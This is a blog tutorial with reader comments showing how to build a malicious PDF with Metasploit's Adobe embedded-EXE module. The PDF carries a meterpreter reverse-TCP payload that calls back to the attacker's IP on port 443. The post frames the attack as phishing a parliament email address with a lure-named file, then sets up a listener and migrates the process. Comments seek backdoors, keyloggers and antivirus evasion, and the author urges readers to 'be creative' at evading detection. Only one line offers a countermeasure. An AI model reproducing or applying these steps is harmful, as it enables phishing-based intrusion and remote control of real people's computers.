• 25,450
  • +1,003
  • 2,796
Client Side Attack Using Adobe PDF Escape EXE Social Engineering

Client Side Attack Using Adobe PDF Escape EXE Social Engineering

Bookmark

Type : Tutorial

Level : Medium, Hard

Testing Platform : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

There are some people says that the weakest security to breach was the human itself. I didn't say it was WRONG, because in fact yes it was the weakest, but I also cannot say TRUE, because sometimes the human didn't know what they are doing because no one told them before ๐Ÿ™‚ .

In this tutorial I will give a demonstration how to attack client side using Adobe PDF Escape EXE vulnerability. Almost 95%(maybe) Windows users have Adobe Acrobat (Acrobat Reader) application in their computer or laptops.

If you watching or reading news a few weeks ago about Australia parliament computer has compromised by unknown hacker, actually the hacker do some social engineering technique to gain a privilege to Australian parliament computer and it was almost the same method use in this tutorial.

Okay, here's the scenario of this attack method :

1. The parliament have an email address let's says (parliament@vishnuvalentino.com) — usually this type of people (maybe about 80%) only know how to use computer without knowing the risk about it… if there's any problem, they will call IT support to fix the mess ๐Ÿ™‚ .

In this scenario, the attacker(Me) will attack using Computer Based Social Engineering. After a few times visiting facebook, Google, and also dumpster diving around the parliament office finally this attacker collecting a few parliament e-mail address lists.

Requirement :

1. Metasploit Framework

2. Windows or Linux OS(I'm using Backtrack 5 in this tutorial)

Step By Step Client Side Attack Using Adobe PDF Escape EXE Social Engineering:

1. The first step, I will create a malicious PDF to use in this attack by using vulnerability in Adobe Reader : Adobe PDF Escape Exe Social Engineering No Javascript.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

Legends:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Use adobe pdf embedded exe exploit

set payload windows/meterpreter/reverse_tcp --> Set the payload to return meterpreter script when exploit successfully performed

set filename Important_Meeting_Notice.pdf --> Make this file as interesting as you can so the victim will open your malicious PDF

set lhost 192.168.8.92 --> Attacker IP address(change with your IP)

set lport 443 --> I'm using this port to prevent victim proxy blocked the traffic(443 is always open :p )

exploit --> generate the malicious PDF

After we successfully generate the malicious PDF, it will stored on your local computer. I've highlight it using yellow marker, check the directory containing malicious PDF file.

2. The next step is sending our malicious code to target e-mail. In this case I will send it to parliament@vishnuvalentino.com (see our scenario if you still asking why).

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

3. After sending our malicious PDF files, we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

4. The victim(parliament@vishnuvalentino.com) opened the e-mail and then scan using their antivirus.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

Antivirus find nothing.

5. After the victim open our malicious PDF file there's an alert box guide victim to tick the "do not show this message again" and click open.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

6. After the victim click open button, our listener start capture reverse connection.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

Yep we're in! ๐Ÿ™‚

Notes :

– After successfully perform this attack, try to migrate process to Explorer.exe (see tutorial here on step 2 and 3).

Countermeasure :

1. When you open some files and there's an aleart appears, read the alert carefully. Sometimes when you click "Next" or "OK" when alert appears is not a good idea ๐Ÿ˜›

Hope you enjoyed it! ๐Ÿ™‚

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Pingback: Hacking Windows Using USB Stick + Social Engineering Toolkit | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • js11

    i cannot find the malicious pdf file

    • v4L

      #js11
      it’s located on your /root/.msf4/data/exploits/ folder

    • chris g

      Run this from a new shell..
      mv /root/.msf4/local/msf.pdf /root/Desktop/

  • js11

    yeah i know that but there's no folder (/.msf4) in /root

    • v4L

      #js11
      then you should search for that .msf/ folder.
      Hope it solved soon

  • Pheonix_Fire

    once we are in our victim's comp is there any way to create a backdoor so we can again enter easily
    Thanks

  • Pheonix_Fire

    one more thing how to run keylogger once u have compromised victim's computer

  • Jeevan

    How to get remote access of a window 7 pc using metasploit

  • looph.crack

    Just a question though. I'll be testing this method with a friend. His pc is totally in a different place (Not within the LAN). I'll try sending him the PDf file then set up a listener on my end. Will it be able to connect to my listener even though he's not part of my LAN? i know the question sounds redundant. But i just want to know whether SET attacks are usually for LAN only?…

  • AJ

    Hi i set up everything but on the attacker computer the listener never captures that i opened it on my compromised computer, what could be wrong?

    • v4L

      #AJ
      how about the adobe version on victim machine?

  • Antoine

    Hi,

    My question was :

    Why this hack technique is not catched by AV’s ?
    They should see the meterpreter payload signature no ?
    Or perhaps others AV detect it ?
    Or perhaps it is not FUD anymore ?

    Thanks for this site, really interesting ๐Ÿ™‚

  • nice, almost all AV cant find it ๐Ÿ˜€

  • Russell

    AVG 2013 Detected file, did not allow me to send the email ๐Ÿ™

  • Joe

    I was able to successfully generate the pdf, but gmail won’t let me send it or yahoo has a mailer daemon saying it can’t send it.
    Any ideas?

  • babar

    hello,
    this is acutally a quite usefull webiste.
    i have recently started wokring in msf and set.
    i have practised this section of email base attack.
    but i dunt think so it is applicable now as Antiviruses are good enuf to identity and delete
    before any activity.kindly tell me how should we achieve a task to embed an exe with pdf
    without antivirus intrusion.thanks you in advance and God bless you

    • v4L

      #babar
      for that, you can try and find by yourself…
      if someone published their work about “my exploit was not detected by antivirus”, then just wait about 1 hour and the antivirus company will make update to detect it.
      btw yes it’s true that all metasploit framework if you use in default mode it will detected by antivirus. so… be creative.

  • LoophCrack

    Hi Vishnu. Great Job here and thanks for updating and answering questions here as well. BTW, id like to set up a pentest lab using only one pc and i plan to run both bactrack and a windows 7 machine both on vmware. Is that a possible setup?

    • v4L

      #LoophCrack
      yes of course. I use VirtualBox and can run BT5 r3, win 7, and debian 6 simultaneously and everything was OK, just a little bit slow, depend on your computer performance ๐Ÿ™‚

  • LoophCrack

    I seem to be having an issue because im using a usb modem and do i have to setup vmware as host adapter only for both BT and win7. this is the only brick wall that hindering me from learning.

  • Wen Qi

    Hi there,

     

    Thanks for the great tutorial. I really need help here. Is there anyway to disable the alert after you open the pdf? Or do you have another pdf exploit guide showing how to do it so that the popup will not appear?

     

    I tried Adobe Reader v9.0, 9.33 both starts up the alert. Which is not cool. I tried to change security settings but to no avail. Do you have a work around for this?

     

    Thanks!

  • Bluesaint

    I am getting following error -> options failed to validate: INFILENAME

    • tyler durdan

      did you figure this out? Having the same issue..

  • rara

    Hi, Thanks for this tutorial.
    But when I am attaching this PDF in gmail or yahoo its showing virus found. Is theirany way to hide and send?